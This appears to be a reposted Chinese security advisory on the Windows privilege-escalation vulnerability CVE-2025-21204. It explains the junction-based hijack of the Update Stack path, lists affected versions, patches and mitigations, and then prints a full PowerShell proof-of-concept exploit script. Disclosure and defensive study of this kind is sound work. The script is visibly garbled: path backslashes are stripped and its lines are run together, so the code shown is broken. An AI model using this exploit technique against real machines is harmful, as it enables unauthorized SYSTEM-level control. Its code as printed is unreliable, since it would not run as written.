近日,微软Windows系统曝出高危本地提权漏洞CVE-2025-21204,攻击者可利用该漏洞通过简单的符号链接攻击,在未经授权的情况下直接获取系统最高权限(SYSTEM权限),威胁用户数据安全甚至控制整个操作系统。以下是漏洞详情与防护指南:
一、漏洞核心危害:低门槛提权,后果严重
攻击原理
漏洞存在于Windows更新组件(如MoUsoCoreWorker.exe和UsoClient.exe)中。由于系统默认信任C:ProgramDataMicrosoftUpdateStackTasks路径,攻击者可通过创建符号链接(Junction),将该路径重定向到用户可控目录,并植入恶意脚本。当系统执行更新任务时,SYSTEM权限进程会加载恶意文件,导致攻击者完全控制系统。
攻击门槛极低
攻击者仅需普通用户权限即可完成漏洞利用,无需复杂技术或物理接触设备。通过触发Windows更新任务(如计划扫描),即可在30秒内实现提权。
潜在风险
窃取敏感数据(如密码、加密证书)
安装隐蔽后门或勒索软件
篡改系统配置,破坏稳定性
二、影响范围:覆盖主流Windows版本
受影响系统:Windows 10(21H2及以上)、Windows 11(所有版本)、Windows Server 2022
修复状态:微软已于2025年4月发布补丁(KB5055518/KB5055523等),但仍有大量用户未更新 。
三、紧急防护措施:三步阻断攻击链
1. 立即更新系统补丁
打开Windows设置,进入“更新与安全”,手动安装2025年4月累积更新(搜索KB5055518或KB5055523)。
注意:切勿删除系统inetpub文件夹,否则可能导致补丁失效。
2. 监控异常行为
启用企业级EDR/XDR工具,重点关注clfs.sys进程和UpdateStack目录的异常操作 。
普通用户可通过任务管理器观察MoUsoCoreWorker.exe和UsoClient.exe的异常启动频率。
3. 最小权限原则
限制普通用户的本地管理员权限,避免攻击者轻易植入恶意文件。
定期审计系统目录权限设置,确保关键路径(如ProgramData)不被非授权用户写入。
4.本地复现
此脚本通过符号链接劫持(Junction)模拟非管理员用户利用漏洞获取SYSTEM权限的过程,具体分为三个阶段:
- 准备阶段
-
创建陷阱目录( $trapPath),模仿系统信任的更新路径C:ProgramDataMicrosoftUpdateStackTasks
-
在用户可控目录生成恶意DLL文件( UpdateStackAgent.dll),内含触发提权后的验证日志代码 - 路径劫持
-
通过 mklink /J命令创建符号链接,将系统原路径劫持到陷阱目录 -
触发Windows更新协调器( UsoClient.exe StartScan),诱导SYSTEM进程MoUsoCoreWorker.exe加载恶意DLL - 验证阶段
-
监控系统进程是否执行恶意负载,生成验证文件( cve2025-proof.log) -
记录攻击日志( verboseLog和evidence.txt),最终输出漏洞利用是否成功本地测试脚本: <#
.SYNOPSIS CVE-2025-21204 exploit simulation for non-admin users via junction-based path hijack..DESCRIPTION Drops a bait payload in a user-controlled directory, creates a junction to hijack the Update Stack path, and triggers the update process to test if SYSTEM accesses the payload. The script provide the poc that allows to run this actions. .AUTHOR Elli Shlomo#># Paths$trapPath = "$env:APPDATAMicrosoftUpdateStackTasks"$updateStackRealPath = "C:ProgramDataMicrosoftUpdateStackTasks"$payloadPath = "$trapPathUpdateStackAgent.dll"$proofPath = "C:UsersPubliccve2025-proof.log"$logPath = "$env:APPDATACVE2025simulation.log"$evidencePath = "$env:APPDATACVE2025evidence.txt"$verdictPath = "$env:APPDATACVE2025vulnerable.txt"$verboseLog = "$env:TEMPcve2025-verbose.log"# IntroWrite-Host"`n[*] CVE-2025-21204 Exploit Simulation (Non-Admin)"Write-Host"[*] Trap directory : $trapPath"Write-Host"[*] Payload DLL path : $payloadPath"Write-Host"[*] SYSTEM proof file : $proofPath"Write-Host"[*] Simulation log : $logPath"Write-Host"[*] Evidence file : $evidencePath"Write-Host"[*] Verdict result : $verdictPath"Write-Host"[*] Verbose transcript : $verboseLog`n"# Start transcriptStart-Transcript-Path$verboseLog-Force# Ensure directories existWrite-Host"[*] Creating necessary directories..."New-Item-Path$trapPath-ItemType Directory -Force-ErrorAction SilentlyContinue | Out-NullNew-Item-Path (Split-Path$logPath) -ItemType Directory -Force-ErrorAction SilentlyContinue | Out-NullWrite-Host"[+] Directories ready.`n"# Payload content$payload = @"Payload executed by SYSTEM at: $(Get-Date)"@# Write bait payloadWrite-Host"[*] Writing payload to: $payloadPath"$payload | Out-File-FilePath$payloadPath-Encoding ASCII$payload | Out-File-FilePath$proofPath-AppendWrite-Host"[+] Payload written.`n"# Simulation metadata log$log = @"CVE-2025-21204 Exploit Simulation-------------------------------------Date : $(Get-Date)Payload File : $payloadPathHijack Path : $updateStackRealPathProof File : $proofPath"@Set-Content-Path$logPath-Value$log-Encoding UTF8 -ForceWrite-Host"[+] Simulation metadata saved.`n"# Attempt junction creation (non-admin safe)Write-Host"[*] Attempting junction (no admin)..."if (-not (Test-Path$updateStackRealPath)) {try {$cmd = "cmd.exe /c mklink /J `"$updateStackRealPath`" `"$trapPath`""Start-Process-FilePath"cmd.exe"-ArgumentList"/c mklink /J `"$updateStackRealPath`" `"$trapPath`""-NoNewWindow-WaitWrite-Host"[+] Junction created: $updateStackRealPath → $trapPath" } catch {Write-Host"[-] Failed to create junction: $_" }} else {Write-Host"[!] Target path already exists: $updateStackRealPath"Write-Host"[-] Cannot create junction unless folder is removed by SYSTEM update cleanup."}Write-Host""# Trigger updateWrite-Host"[*] Triggering UsoClient.exe (StartScan)..."try {Start-Process UsoClient.exe -ArgumentList StartScan -WindowStyleHiddenWrite-Host"[+] UsoClient.exe started.`n"} catch {Write-Host"[-] Failed to trigger UsoClient.exe: $_"}# Monitor for SYSTEM processWrite-Host"[*] Monitoring for SYSTEM process MoUsoCoreWorker.exe..."$found = $falsefor ($i = 1; $i-le6; $i++) {Start-Sleep-Seconds5Write-Host"[=] Attempt ${i}: Checking..."if (Get-Process-Name"MoUsoCoreWorker"-ErrorAction SilentlyContinue) {Write-Host"[!] SYSTEM process detected: MoUsoCoreWorker.exe"$found = $truebreak }}Start-Sleep-Seconds5# Check for successWrite-Host"`n[*] Analyzing payload execution..."if (Test-Path$proofPath) {$owner = (Get-Acl$proofPath).Owner$timestamp = (Get-Item$proofPath).LastWriteTime$details = @"[+] Exploit successfulPayload executed as: $ownerLast Modified: $timestamp"@Set-Content-Path$verdictPath-Value$trueWrite-Host"[✓] SUCCESS: SYSTEM likely accessed the payload."} else {$details = @"[!] Exploit failedNo proof file found.Time: $(Get-Date)"@Set-Content-Path$verdictPath-Value$falseWrite-Host"[✗] FAILURE: Payload was not executed by SYSTEM."}# Save evidenceSet-Content-Path$evidencePath-Value$details-Encoding UTF8Write-Host"[*] Forensic evidence saved: $evidencePath"# EndStop-TranscriptWrite-Host"`n[✓] Simulation complete. See verbose log: $verboseLog`n"
原文始发于微信公众号(Z0安全):Windows高危提权漏洞CVE-2025-21204曝光,千万用户需立即修复
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论